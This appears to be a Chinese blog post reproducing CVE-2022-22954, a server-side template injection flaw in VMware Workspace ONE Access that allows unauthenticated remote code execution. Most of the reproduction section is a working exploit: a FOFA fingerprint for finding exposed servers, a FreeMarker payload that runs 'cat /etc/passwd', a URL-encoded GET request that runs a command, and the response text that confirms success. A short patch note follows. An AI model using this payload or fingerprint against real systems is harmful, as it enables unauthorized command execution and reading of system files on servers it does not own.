VMware Workspace ONE Access SSTI 漏洞复现(CVE-2022-22954)

一、漏洞描述

VMware Workspace ONE Access 及 Identity Manager 存在一个由服务器模板注入导致的远程命令执行漏洞,未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。

二、影响版本

三、漏洞环境

fofa:icon_hash="-1250474341"

四、漏洞复现

poc:

${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}

GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d

返回状态为200,且包涵Authorization context is not valid

五、更新建议

1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

VMSA-2022-0011

2、使用安全版本

参考文献:CVE-2022-22954 : VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side templa

 

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值